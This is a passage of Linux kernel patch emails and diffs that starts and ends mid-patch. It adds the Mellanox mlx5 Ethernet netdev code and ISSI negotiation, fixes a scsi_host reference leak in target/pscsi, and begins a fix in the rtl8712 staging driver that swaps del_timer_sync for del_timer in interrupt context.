MLX5_SET(rx_hash_field_select, hfso, l4_prot_type, + MLX5_L4_PROT_TYPE_TCP); + MLX5_SET(rx_hash_field_select, hfso, selected_fields, + MLX5_HASH_ALL); + break; + + case MLX5E_TT_IPV4_UDP: + MLX5_SET(rx_hash_field_select, hfso, l3_prot_type, + MLX5_L3_PROT_TYPE_IPV4); + MLX5_SET(rx_hash_field_select, hfso, l4_prot_type, + MLX5_L4_PROT_TYPE_UDP); + MLX5_SET(rx_hash_field_select, hfso, selected_fields, + MLX5_HASH_ALL); + break; + + case MLX5E_TT_IPV6_UDP: + MLX5_SET(rx_hash_field_select, hfso, l3_prot_type, + MLX5_L3_PROT_TYPE_IPV6); + MLX5_SET(rx_hash_field_select, hfso, l4_prot_type, + MLX5_L4_PROT_TYPE_UDP); + MLX5_SET(rx_hash_field_select, hfso, selected_fields, + MLX5_HASH_ALL); + break; + + case MLX5E_TT_IPV4: + MLX5_SET(rx_hash_field_select, hfso, l3_prot_type, + MLX5_L3_PROT_TYPE_IPV4); + MLX5_SET(rx_hash_field_select, hfso, selected_fields, + MLX5_HASH_IP); + break; + + case MLX5E_TT_IPV6: + MLX5_SET(rx_hash_field_select, hfso, l3_prot_type, + MLX5_L3_PROT_TYPE_IPV6); + MLX5_SET(rx_hash_field_select, hfso, selected_fields, + MLX5_HASH_IP); + break; + } +} + +static int mlx5e_open_tir(struct mlx5e_priv *priv, int tt) +{ + struct mlx5_core_dev *mdev = priv->mdev; + u32 *in; + void *tirc; + int inlen; + int err; + + inlen = MLX5_ST_SZ_BYTES(create_tir_in); + in = mlx5_vzalloc(inlen); + if (!in) + return -ENOMEM; + + tirc = MLX5_ADDR_OF(create_tir_in, in, ctx); + + mlx5e_build_tir_ctx(priv, tirc, tt); + + err = mlx5_create_tir(mdev, in, inlen, &priv->tirn[tt]); + + kvfree(in); + + return err; +} + +static void mlx5e_close_tir(struct mlx5e_priv *priv, int tt) +{ + mlx5_destroy_tir(priv->mdev, priv->tirn[tt]); +} + +static int mlx5e_open_tirs(struct mlx5e_priv *priv) +{ + int err; + int i; + + for (i = 0; i < MLX5E_NUM_TT; i++) { + err = mlx5e_open_tir(priv, i); + if (err) + goto err_close_tirs; + } + + return 0; + +err_close_tirs: + for (i--; i >= 0; i--) + mlx5e_close_tir(priv, i); + + return err; +} + +static void mlx5e_close_tirs(struct mlx5e_priv *priv) +{ + int i; + + for (i = 0; i < MLX5E_NUM_TT; i++) + mlx5e_close_tir(priv, i); +} + +int mlx5e_open_locked(struct net_device *netdev) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + struct mlx5_core_dev *mdev = priv->mdev; + int actual_mtu; + int num_txqs; + int err; + + num_txqs = roundup_pow_of_two(priv->params.num_channels) * + priv->params.num_tc; + netif_set_real_num_tx_queues(netdev, num_txqs); + netif_set_real_num_rx_queues(netdev, priv->params.num_channels); + + err = mlx5_set_port_mtu(mdev, netdev->mtu); + if (err) { + netdev_err(netdev, "%s: mlx5_set_port_mtu failed %d\n", + __func__, err); + return err; + } + + err = mlx5_query_port_oper_mtu(mdev, &actual_mtu); + if (err) { + netdev_err(netdev, "%s: 
mlx5_query_port_oper_mtu failed %d\n", + __func__, err); + return err; + } + + if (actual_mtu != netdev->mtu) + netdev_warn(netdev, "%s: Failed to set MTU to %d\n", + __func__, netdev->mtu); + + netdev->mtu = actual_mtu; + + err = mlx5e_open_tises(priv); + if (err) { + netdev_err(netdev, "%s: mlx5e_open_tises failed, %d\n", + __func__, err); + return err; + } + + err = mlx5e_open_channels(priv); + if (err) { + netdev_err(netdev, "%s: mlx5e_open_channels failed, %d\n", + __func__, err); + goto err_close_tises; + } + + err = mlx5e_open_rqt(priv); + if (err) { + netdev_err(netdev, "%s: mlx5e_open_rqt failed, %d\n", + __func__, err); + goto err_close_channels; + } + + err = mlx5e_open_tirs(priv); + if (err) { + netdev_err(netdev, "%s: mlx5e_open_tir failed, %d\n", + __func__, err); + goto err_close_rqls; + } + + err = mlx5e_open_flow_table(priv); + if (err) { + netdev_err(netdev, "%s: mlx5e_open_flow_table failed, %d\n", + __func__, err); + goto err_close_tirs; + } + + err = mlx5e_add_all_vlan_rules(priv); + if (err) { + netdev_err(netdev, "%s: mlx5e_add_all_vlan_rules failed, %d\n", + __func__, err); + goto err_close_flow_table; + } + + mlx5e_init_eth_addr(priv); + + set_bit(MLX5E_STATE_OPENED, &priv->state); + + mlx5e_update_carrier(priv); + mlx5e_set_rx_mode_core(priv); + + schedule_delayed_work(&priv->update_stats_work, 0); + return 0; + +err_close_flow_table: + mlx5e_close_flow_table(priv); + +err_close_tirs: + mlx5e_close_tirs(priv); + +err_close_rqls: + mlx5e_close_rqt(priv); + +err_close_channels: + mlx5e_close_channels(priv); + +err_close_tises: + mlx5e_close_tises(priv); + + return err; +} + +static int mlx5e_open(struct net_device *netdev) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + int err; + + mutex_lock(&priv->state_lock); + err = mlx5e_open_locked(netdev); + mutex_unlock(&priv->state_lock); + + return err; +} + +int mlx5e_close_locked(struct net_device *netdev) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + + clear_bit(MLX5E_STATE_OPENED, &priv->state); + + mlx5e_set_rx_mode_core(priv); + mlx5e_del_all_vlan_rules(priv); + netif_carrier_off(priv->netdev); + mlx5e_close_flow_table(priv); + mlx5e_close_tirs(priv); + mlx5e_close_rqt(priv); + mlx5e_close_channels(priv); + mlx5e_close_tises(priv); + + return 0; +} + +static int mlx5e_close(struct net_device *netdev) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + int err; + + mutex_lock(&priv->state_lock); + err = mlx5e_close_locked(netdev); + mutex_unlock(&priv->state_lock); + + return err; +} + +int mlx5e_update_priv_params(struct mlx5e_priv *priv, + struct mlx5e_params *new_params) +{ + int err = 0; + int was_opened; + + WARN_ON(!mutex_is_locked(&priv->state_lock)); + + was_opened = test_bit(MLX5E_STATE_OPENED, &priv->state); + if (was_opened) + mlx5e_close_locked(priv->netdev); + + priv->params = *new_params; + + if (was_opened) + err = mlx5e_open_locked(priv->netdev); + + return err; +} + +static struct rtnl_link_stats64 * +mlx5e_get_stats(struct net_device *dev, struct rtnl_link_stats64 *stats) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + struct mlx5e_vport_stats *vstats = &priv->stats.vport; + + stats->rx_packets = vstats->rx_packets; + stats->rx_bytes = vstats->rx_bytes; + stats->tx_packets = vstats->tx_packets; + stats->tx_bytes = vstats->tx_bytes; + stats->multicast = vstats->rx_multicast_packets + + vstats->tx_multicast_packets; + stats->tx_errors = vstats->tx_error_packets; + stats->rx_errors = vstats->rx_error_packets; + stats->tx_dropped = vstats->tx_queue_dropped; + stats->rx_crc_errors = 0; 
+ stats->rx_length_errors = 0; + + return stats; +} + +static void mlx5e_set_rx_mode(struct net_device *dev) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + + schedule_work(&priv->set_rx_mode_work); +} + +static int mlx5e_set_mac(struct net_device *netdev, void *addr) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + struct sockaddr *saddr = addr; + + if (!is_valid_ether_addr(saddr->sa_data)) + return -EADDRNOTAVAIL; + + netif_addr_lock_bh(netdev); + ether_addr_copy(netdev->dev_addr, saddr->sa_data); + netif_addr_unlock_bh(netdev); + + schedule_work(&priv->set_rx_mode_work); + + return 0; +} + +static int mlx5e_set_features(struct net_device *netdev, + netdev_features_t features) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + netdev_features_t changes = features ^ netdev->features; + struct mlx5e_params new_params; + bool update_params = false; + + mutex_lock(&priv->state_lock); + new_params = priv->params; + + if (changes & NETIF_F_LRO) { + new_params.lro_en = !!(features & NETIF_F_LRO); + update_params = true; + } + + if (update_params) + mlx5e_update_priv_params(priv, &new_params); + + if (changes & NETIF_F_HW_VLAN_CTAG_FILTER) { + if (features & NETIF_F_HW_VLAN_CTAG_FILTER) + mlx5e_enable_vlan_filter(priv); + else + mlx5e_disable_vlan_filter(priv); + } + + mutex_unlock(&priv->state_lock); + + return 0; +} + +static int mlx5e_change_mtu(struct net_device *netdev, int new_mtu) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + struct mlx5_core_dev *mdev = priv->mdev; + int max_mtu; + int err = 0; + + err = mlx5_query_port_max_mtu(mdev, &max_mtu); + if (err) + return err; + + if (new_mtu > max_mtu || new_mtu < MLX5E_PARAMS_MIN_MTU) { + netdev_err(netdev, "%s: Bad MTU size, mtu must be [%d-%d]\n", + __func__, MLX5E_PARAMS_MIN_MTU, max_mtu); + return -EINVAL; + } + + mutex_lock(&priv->state_lock); + netdev->mtu = new_mtu; + err = mlx5e_update_priv_params(priv, &priv->params); + mutex_unlock(&priv->state_lock); + + return err; +} + +static struct net_device_ops mlx5e_netdev_ops = { + .ndo_open = mlx5e_open, + .ndo_stop = mlx5e_close, + .ndo_start_xmit = mlx5e_xmit, + .ndo_get_stats64 = mlx5e_get_stats, + .ndo_set_rx_mode = mlx5e_set_rx_mode, + .ndo_set_mac_address = mlx5e_set_mac, + .ndo_vlan_rx_add_vid = mlx5e_vlan_rx_add_vid, + .ndo_vlan_rx_kill_vid = mlx5e_vlan_rx_kill_vid, + .ndo_set_features = mlx5e_set_features, + .ndo_change_mtu = mlx5e_change_mtu, +}; + +static int mlx5e_check_required_hca_cap(struct mlx5_core_dev *mdev) +{ + if (MLX5_CAP_GEN(mdev, port_type) != MLX5_CAP_PORT_TYPE_ETH) + return -ENOTSUPP; + if (!MLX5_CAP_GEN(mdev, eth_net_offloads) || + !MLX5_CAP_GEN(mdev, nic_flow_table) || + !MLX5_CAP_ETH(mdev, csum_cap) || + !MLX5_CAP_ETH(mdev, max_lso_cap) || + !MLX5_CAP_ETH(mdev, vlan_cap) || + !MLX5_CAP_ETH(mdev, rss_ind_tbl_cap)) { + mlx5_core_warn(mdev, + "Not creating net device, some required device capabilities are missing\n"); + return -ENOTSUPP; + } + return 0; +} + +static void mlx5e_build_netdev_priv(struct mlx5_core_dev *mdev, + struct net_device *netdev, + int num_comp_vectors) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + + priv->params.log_sq_size = + MLX5E_PARAMS_DEFAULT_LOG_SQ_SIZE; + priv->params.log_rq_size = + MLX5E_PARAMS_DEFAULT_LOG_RQ_SIZE; + priv->params.rx_cq_moderation_usec = + MLX5E_PARAMS_DEFAULT_RX_CQ_MODERATION_USEC; + priv->params.rx_cq_moderation_pkts = + MLX5E_PARAMS_DEFAULT_RX_CQ_MODERATION_PKTS; + priv->params.tx_cq_moderation_usec = + MLX5E_PARAMS_DEFAULT_TX_CQ_MODERATION_USEC; + priv->params.tx_cq_moderation_pkts = + 
MLX5E_PARAMS_DEFAULT_TX_CQ_MODERATION_PKTS; + priv->params.min_rx_wqes = + MLX5E_PARAMS_DEFAULT_MIN_RX_WQES; + priv->params.rx_hash_log_tbl_sz = + (order_base_2(num_comp_vectors) > + MLX5E_PARAMS_DEFAULT_RX_HASH_LOG_TBL_SZ) ? + order_base_2(num_comp_vectors) : + MLX5E_PARAMS_DEFAULT_RX_HASH_LOG_TBL_SZ; + priv->params.num_tc = 1; + priv->params.default_vlan_prio = 0; + + priv->params.lro_en = false && !!MLX5_CAP_ETH(priv->mdev, lro_cap); + priv->params.lro_wqe_sz = + MLX5E_PARAMS_DEFAULT_LRO_WQE_SZ; + + priv->mdev = mdev; + priv->netdev = netdev; + priv->params.num_channels = num_comp_vectors; + priv->order_base_2_num_channels = order_base_2(num_comp_vectors); + priv->queue_mapping_channel_mask = + roundup_pow_of_two(num_comp_vectors) - 1; + priv->num_tc = priv->params.num_tc; + priv->default_vlan_prio = priv->params.default_vlan_prio; + + spin_lock_init(&priv->async_events_spinlock); + mutex_init(&priv->state_lock); + + INIT_WORK(&priv->update_carrier_work, mlx5e_update_carrier_work); + INIT_WORK(&priv->set_rx_mode_work, mlx5e_set_rx_mode_work); + INIT_DELAYED_WORK(&priv->update_stats_work, mlx5e_update_stats_work); +} + +static void mlx5e_set_netdev_dev_addr(struct net_device *netdev) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + + mlx5_query_vport_mac_address(priv->mdev, netdev->dev_addr); +} + +static void mlx5e_build_netdev(struct net_device *netdev) +{ + struct mlx5e_priv *priv = netdev_priv(netdev); + struct mlx5_core_dev *mdev = priv->mdev; + + SET_NETDEV_DEV(netdev, &mdev->pdev->dev); + + if (priv->num_tc > 1) { + mlx5e_netdev_ops.ndo_select_queue = mlx5e_select_queue; + mlx5e_netdev_ops.ndo_start_xmit = mlx5e_xmit_multi_tc; + } + + netdev->netdev_ops = &mlx5e_netdev_ops; + netdev->watchdog_timeo = 15 * HZ; + + netdev->ethtool_ops = &mlx5e_ethtool_ops; + + netdev->vlan_features |= NETIF_F_IP_CSUM; + netdev->vlan_features |= NETIF_F_IPV6_CSUM; + netdev->vlan_features |= NETIF_F_GRO; + netdev->vlan_features |= NETIF_F_TSO; + netdev->vlan_features |= NETIF_F_TSO6; + netdev->vlan_features |= NETIF_F_RXCSUM; + netdev->vlan_features |= NETIF_F_RXHASH; + + if (!!MLX5_CAP_ETH(mdev, lro_cap)) + netdev->vlan_features |= NETIF_F_LRO; + + netdev->hw_features = netdev->vlan_features; + netdev->hw_features |= NETIF_F_HW_VLAN_CTAG_TX; + netdev->hw_features |= NETIF_F_HW_VLAN_CTAG_RX; + netdev->hw_features |= NETIF_F_HW_VLAN_CTAG_FILTER; + + netdev->features = netdev->hw_features; + if (!priv->params.lro_en) + netdev->features &= ~NETIF_F_LRO; + + netdev->features |= NETIF_F_HIGHDMA; + + netdev->priv_flags |= IFF_UNICAST_FLT; + + mlx5e_set_netdev_dev_addr(netdev); +} + +static int mlx5e_create_mkey(struct mlx5e_priv *priv, u32 pdn, + struct mlx5_core_mr *mr) +{ + struct mlx5_core_dev *mdev = priv->mdev; + struct mlx5_create_mkey_mbox_in *in; + int err; + + in = mlx5_vzalloc(sizeof(*in)); + if (!in) + return -ENOMEM; + + in->seg.flags = MLX5_PERM_LOCAL_WRITE | + MLX5_PERM_LOCAL_READ | + MLX5_ACCESS_MODE_PA; + in->seg.flags_pd = cpu_to_be32(pdn | MLX5_MKEY_LEN64); + in->seg.qpn_mkey7_0 = cpu_to_be32(0xffffff << 8); + + err = mlx5_core_create_mkey(mdev, mr, in, sizeof(*in), NULL, NULL, + NULL); + + kvfree(in); + + return err; +} + +static void *mlx5e_create_netdev(struct mlx5_core_dev *mdev) +{ + struct net_device *netdev; + struct mlx5e_priv *priv; + int ncv = mdev->priv.eq_table.num_comp_vectors; + int err; + + if (mlx5e_check_required_hca_cap(mdev)) + return NULL; + + netdev = alloc_etherdev_mqs(sizeof(struct mlx5e_priv), + roundup_pow_of_two(ncv) * MLX5E_MAX_NUM_TC, + ncv); + if (!netdev) 
{ + mlx5_core_err(mdev, "alloc_etherdev_mqs() failed\n"); + return NULL; + } + + mlx5e_build_netdev_priv(mdev, netdev, ncv); + mlx5e_build_netdev(netdev); + + netif_carrier_off(netdev); + + priv = netdev_priv(netdev); + + err = mlx5_alloc_map_uar(mdev, &priv->cq_uar); + if (err) { + netdev_err(netdev, "%s: mlx5_alloc_map_uar failed, %d\n", + __func__, err); + goto err_free_netdev; + } + + err = mlx5_core_alloc_pd(mdev, &priv->pdn); + if (err) { + netdev_err(netdev, "%s: mlx5_core_alloc_pd failed, %d\n", + __func__, err); + goto err_unmap_free_uar; + } + + err = mlx5e_create_mkey(priv, priv->pdn, &priv->mr); + if (err) { + netdev_err(netdev, "%s: mlx5e_create_mkey failed, %d\n", + __func__, err); + goto err_dealloc_pd; + } + + err = register_netdev(netdev); + if (err) { + netdev_err(netdev, "%s: register_netdev failed, %d\n", + __func__, err); + goto err_destroy_mkey; + } + + mlx5e_enable_async_events(priv); + + return priv; + +err_destroy_mkey: + mlx5_core_destroy_mkey(mdev, &priv->mr); + +err_dealloc_pd: + mlx5_core_dealloc_pd(mdev, priv->pdn); + +err_unmap_free_uar: + mlx5_unmap_free_uar(mdev, &priv->cq_uar); + +err_free_netdev: + free_netdev(netdev); + + return NULL; +} + +static void mlx5e_destroy_netdev(struct mlx5_core_dev *mdev, void *vpriv) +{ + struct mlx5e_priv *priv = vpriv; + struct net_device *netdev = priv->netdev; + + unregister_netdev(netdev); + mlx5_core_destroy_mkey(priv->mdev, &priv->mr); + mlx5_core_dealloc_pd(priv->mdev, priv->pdn); + mlx5_unmap_free_uar(priv->mdev, &priv->cq_uar); + mlx5e_disable_async_events(priv); + flush_scheduled_work(); + free_netdev(netdev); +} + +static void *mlx5e_get_netdev(void *vpriv) +{ + struct mlx5e_priv *priv = vpriv; + + return priv->netdev; +} + +static struct mlx5_interface mlx5e_interface = { + .add = mlx5e_create_netdev, + .remove = mlx5e_destroy_netdev, + .event = mlx5e_async_event, + .protocol = MLX5_INTERFACE_PROTOCOL_ETH, + .get_dev = mlx5e_get_netdev, +}; + +void mlx5e_init(void) +{ + mlx5_register_interface(&mlx5e_interface); +} + +void mlx5e_cleanup(void) +{ + mlx5_unregister_interface(&mlx5e_interface); +} diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c index e7b7b123a128..1c37f587426d 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/main.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c @@ -48,10 +48,6 @@ #include #include "mlx5_core.h" -#define DRIVER_NAME "mlx5_core" -#define DRIVER_VERSION "3.0" -#define DRIVER_RELDATE "January 2015" - MODULE_AUTHOR("Eli Cohen "); MODULE_DESCRIPTION("Mellanox Connect-IB, ConnectX-4 core driver"); MODULE_LICENSE("Dual BSD/GPL"); @@ -614,6 +610,61 @@ static int alloc_comp_eqs(struct mlx5_core_dev *dev) return err; } +#ifdef CONFIG_MLX5_CORE_EN +static int mlx5_core_set_issi(struct mlx5_core_dev *dev) +{ + u32 query_in[MLX5_ST_SZ_DW(query_issi_in)]; + u32 query_out[MLX5_ST_SZ_DW(query_issi_out)]; + u32 set_in[MLX5_ST_SZ_DW(set_issi_in)]; + u32 set_out[MLX5_ST_SZ_DW(set_issi_out)]; + int err; + u32 sup_issi; + + memset(query_in, 0, sizeof(query_in)); + memset(query_out, 0, sizeof(query_out)); + + MLX5_SET(query_issi_in, query_in, opcode, MLX5_CMD_OP_QUERY_ISSI); + + err = mlx5_cmd_exec_check_status(dev, query_in, sizeof(query_in), + query_out, sizeof(query_out)); + if (err) { + if (((struct mlx5_outbox_hdr *)query_out)->status == + MLX5_CMD_STAT_BAD_OP_ERR) { + pr_debug("Only ISSI 0 is supported\n"); + return 0; + } + + pr_err("failed to query ISSI\n"); + return err; + } + + sup_issi = MLX5_GET(query_issi_out, query_out, 
supported_issi_dw0); + + if (sup_issi & (1 << 1)) { + memset(set_in, 0, sizeof(set_in)); + memset(set_out, 0, sizeof(set_out)); + + MLX5_SET(set_issi_in, set_in, opcode, MLX5_CMD_OP_SET_ISSI); + MLX5_SET(set_issi_in, set_in, current_issi, 1); + + err = mlx5_cmd_exec_check_status(dev, set_in, sizeof(set_in), + set_out, sizeof(set_out)); + if (err) { + pr_err("failed to set ISSI=1\n"); + return err; + } + + dev->issi = 1; + + return 0; + } else if (sup_issi & (1 << 0)) { + return 0; + } + + return -ENOTSUPP; +} +#endif + static int mlx5_dev_init(struct mlx5_core_dev *dev, struct pci_dev *pdev) { struct mlx5_priv *priv = &dev->priv; @@ -676,6 +727,14 @@ static int mlx5_dev_init(struct mlx5_core_dev *dev, struct pci_dev *pdev) goto err_pagealloc_cleanup; } +#ifdef CONFIG_MLX5_CORE_EN + err = mlx5_core_set_issi(dev); + if (err) { + dev_err(&pdev->dev, "failed to set issi\n"); + goto err_disable_hca; + } +#endif + err = mlx5_satisfy_startup_pages(dev, 1); if (err) { dev_err(&pdev->dev, "failed to allocate boot pages\n"); @@ -1084,6 +1143,10 @@ static int __init init(void) if (err) goto err_health; +#ifdef CONFIG_MLX5_CORE_EN + mlx5e_init(); +#endif + return 0; err_health: @@ -1096,6 +1159,9 @@ static int __init init(void) static void __exit cleanup(void) { +#ifdef CONFIG_MLX5_CORE_EN + mlx5e_cleanup(); +#endif pci_unregister_driver(&mlx5_core_driver); mlx5_health_cleanup(); destroy_workqueue(mlx5_core_wq); diff --git a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h index b986f1c258bc..6983c1047255 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h +++ b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h @@ -1,5 +1,5 @@ /* - * Copyright (c) 2013-2015, Mellanox Technologies. All rights reserved. + * Copyright (c) 2013-2015, Mellanox Technologies, Ltd. All rights reserved. * * This software is available to you under a choice of one of two * licenses. You may choose to be licensed under the terms of the GNU @@ -37,6 +37,10 @@ #include #include +#define DRIVER_NAME "mlx5_core" +#define DRIVER_VERSION "3.0-1" +#define DRIVER_RELDATE "January 2015" + extern int mlx5_core_debug_mask; #define mlx5_core_dbg(dev, format, ...) 
\ @@ -78,4 +82,7 @@ int mlx5_cmd_query_adapter(struct mlx5_core_dev *dev); int mlx5_cmd_init_hca(struct mlx5_core_dev *dev); int mlx5_cmd_teardown_hca(struct mlx5_core_dev *dev); +void mlx5e_init(void); +void mlx5e_cleanup(void); + #endif /* __MLX5_CORE_H__ */ diff --git a/include/linux/mlx5/device.h b/include/linux/mlx5/device.h index 4ee52bf1f959..b288c538347a 100644 --- a/include/linux/mlx5/device.h +++ b/include/linux/mlx5/device.h @@ -1153,4 +1153,23 @@ enum mlx5_cap_type { #define MLX5_CAP_ODP(mdev, cap)\ MLX5_GET(odp_cap, mdev->hca_caps_cur[MLX5_CAP_ODP], cap) +enum { + MLX5_CMD_STAT_OK = 0x0, + MLX5_CMD_STAT_INT_ERR = 0x1, + MLX5_CMD_STAT_BAD_OP_ERR = 0x2, + MLX5_CMD_STAT_BAD_PARAM_ERR = 0x3, + MLX5_CMD_STAT_BAD_SYS_STATE_ERR = 0x4, + MLX5_CMD_STAT_BAD_RES_ERR = 0x5, + MLX5_CMD_STAT_RES_BUSY = 0x6, + MLX5_CMD_STAT_LIM_ERR = 0x8, + MLX5_CMD_STAT_BAD_RES_STATE_ERR = 0x9, + MLX5_CMD_STAT_IX_ERR = 0xa, + MLX5_CMD_STAT_NO_RES_ERR = 0xf, + MLX5_CMD_STAT_BAD_INP_LEN_ERR = 0x50, + MLX5_CMD_STAT_BAD_OUTP_LEN_ERR = 0x51, + MLX5_CMD_STAT_BAD_QP_STATE_ERR = 0x10, + MLX5_CMD_STAT_BAD_PKT_ERR = 0x30, + MLX5_CMD_STAT_BAD_SIZE_OUTS_CQES_ERR = 0x40, +}; + #endif /* MLX5_DEVICE_H */ diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index 51738472657e..7fa26f03acc1 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -489,6 +489,7 @@ struct mlx5_core_dev { struct mlx5_priv priv; struct mlx5_profile *profile; atomic_t num_qps; + u32 issi; }; struct mlx5_db { From 5a7125c64def3b21f8147eca8b54949a60963942 Mon Sep 17 00:00:00 2001 From: Andy Grover Date: Fri, 22 May 2015 14:07:44 -0700 Subject: [PATCH 503/872] target/pscsi: Don't leak scsi_host if hba is VIRTUAL_HOST See https://bugzilla.redhat.com/show_bug.cgi?id=1025672 We need to put() the reference to the scsi host that we got in pscsi_configure_device(). In VIRTUAL_HOST mode it is associated with the dev_virt, not the hba_virt. 
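In outline, pscsi_configure_device() now records the host it looked up in the new pdv_lld_host field, and pscsi_free_device() drops that reference on teardown; condensed from the hunks below:

  /* condensed sketch of the pscsi_free_device() release logic below */
  if (phv->phv_mode == PHV_LLD_SCSI_HOST_NO && phv->phv_lld_host)
          scsi_host_put(phv->phv_lld_host);       /* host held via the hba */
  else if (pdv->pdv_lld_host)
          scsi_host_put(pdv->pdv_lld_host);       /* host held via the dev (VIRTUAL_HOST) */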
Signed-off-by: Andy Grover Cc: stable@vger.kernel.org # 2.6.38+ Signed-off-by: Nicholas Bellinger --- drivers/target/target_core_pscsi.c | 3 +++ drivers/target/target_core_pscsi.h | 1 + 2 files changed, 4 insertions(+) diff --git a/drivers/target/target_core_pscsi.c b/drivers/target/target_core_pscsi.c index f6c954c4635f..4073869d2090 100644 --- a/drivers/target/target_core_pscsi.c +++ b/drivers/target/target_core_pscsi.c @@ -521,6 +521,7 @@ static int pscsi_configure_device(struct se_device *dev) " pdv_host_id: %d\n", pdv->pdv_host_id); return -EINVAL; } + pdv->pdv_lld_host = sh; } } else { if (phv->phv_mode == PHV_VIRTUAL_HOST_ID) { @@ -603,6 +604,8 @@ static void pscsi_free_device(struct se_device *dev) if ((phv->phv_mode == PHV_LLD_SCSI_HOST_NO) && (phv->phv_lld_host != NULL)) scsi_host_put(phv->phv_lld_host); + else if (pdv->pdv_lld_host) + scsi_host_put(pdv->pdv_lld_host); if ((sd->type == TYPE_DISK) || (sd->type == TYPE_ROM)) scsi_device_put(sd); diff --git a/drivers/target/target_core_pscsi.h b/drivers/target/target_core_pscsi.h index 1bd757dff8ee..820d3052b775 100644 --- a/drivers/target/target_core_pscsi.h +++ b/drivers/target/target_core_pscsi.h @@ -45,6 +45,7 @@ struct pscsi_dev_virt { int pdv_lun_id; struct block_device *pdv_bd; struct scsi_device *pdv_sd; + struct Scsi_Host *pdv_lld_host; } ____cacheline_aligned; typedef enum phv_modes { From 39a6e7376af08b4caabf57ae21335bd31f003073 Mon Sep 17 00:00:00 2001 From: Sudip Mukherjee Date: Fri, 15 May 2015 14:49:39 +0530 Subject: [PATCH 504/872] staging: rtl8712: fix stack dump del_timer_sync() is not to be called in interrupt context unless the timer is irqsafe. But most of the functions that commits 6501c8e7d86cca5f and 382d020f4459cd77 touched are called in interrupt context, and as a result the WARN_ON was getting triggered. Changed to del_timer() in the places that are called from interrupt context.
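To illustrate the constraint (a minimal standalone sketch, not code from this driver; example_ctx and example_stop_blinking are made-up names): del_timer_sync() may spin until a running handler finishes and WARNs when used from hardirq context on a timer that is not irqsafe, whereas del_timer() only deactivates a pending timer and is safe there.

  #include <linux/timer.h>

  struct example_ctx {                    /* hypothetical context, illustration only */
          struct timer_list blink_timer;
  };

  /* called from interrupt context, e.g. a completion handler */
  static void example_stop_blinking(struct example_ctx *ctx)
  {
          /*
           * del_timer_sync(&ctx->blink_timer) could spin waiting for a
           * running handler and trips the WARN_ON in this context;
           * del_timer() just deactivates a pending timer and returns.
           */
          del_timer(&ctx->blink_timer);
  }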
Fixes: 382d020f4459cd77 ("Staging: rtl8712: Eliminate use of _cancel_timer" Fixes: 6501c8e7d86cca5f ("Staging: rtl8712: Eliminate use of _cancel_timer_ex") Fixes: https://bugzilla.kernel.org/show_bug.cgi?id=97711 Reported-by: Arek Rusniak Tested-by: Arek Rusniak Signed-off-by: Sudip Mukherjee Signed-off-by: Greg Kroah-Hartman --- drivers/staging/rtl8712/rtl8712_led.c | 144 +++++++++++----------- drivers/staging/rtl8712/rtl871x_cmd.c | 2 +- drivers/staging/rtl8712/rtl871x_mlme.c | 6 +- drivers/staging/rtl8712/rtl871x_pwrctrl.c | 2 +- drivers/staging/rtl8712/rtl871x_sta_mgt.c | 2 +- 5 files changed, 78 insertions(+), 78 deletions(-) diff --git a/drivers/staging/rtl8712/rtl8712_led.c b/drivers/staging/rtl8712/rtl8712_led.c index f1d47a0676c3..ada8d5dafd49 100644 --- a/drivers/staging/rtl8712/rtl8712_led.c +++ b/drivers/staging/rtl8712/rtl8712_led.c @@ -898,11 +898,11 @@ static void SwLedControlMode1(struct _adapter *padapter, IS_LED_WPS_BLINKING(pLed)) return; if (pLed->bLedLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedLinkBlinkInProgress = false; } if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } pLed->bLedNoLinkBlinkInProgress = true; @@ -921,11 +921,11 @@ static void SwLedControlMode1(struct _adapter *padapter, IS_LED_WPS_BLINKING(pLed)) return; if (pLed->bLedNoLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedNoLinkBlinkInProgress = false; } if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } pLed->bLedLinkBlinkInProgress = true; @@ -946,15 +946,15 @@ static void SwLedControlMode1(struct _adapter *padapter, if (IS_LED_WPS_BLINKING(pLed)) return; if (pLed->bLedNoLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedNoLinkBlinkInProgress = false; } if (pLed->bLedLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedLinkBlinkInProgress = false; } if (pLed->bLedBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedBlinkInProgress = false; } pLed->bLedScanBlinkInProgress = true; @@ -975,11 +975,11 @@ static void SwLedControlMode1(struct _adapter *padapter, IS_LED_WPS_BLINKING(pLed)) return; if (pLed->bLedNoLinkBlinkInProgress == true) { - del_timer_sync(&pLed->BlinkTimer); + del_timer(&pLed->BlinkTimer); pLed->bLedNoLinkBlinkInProgress = false; } if (pLed->bLedLinkBlinkInProgress == true) { - 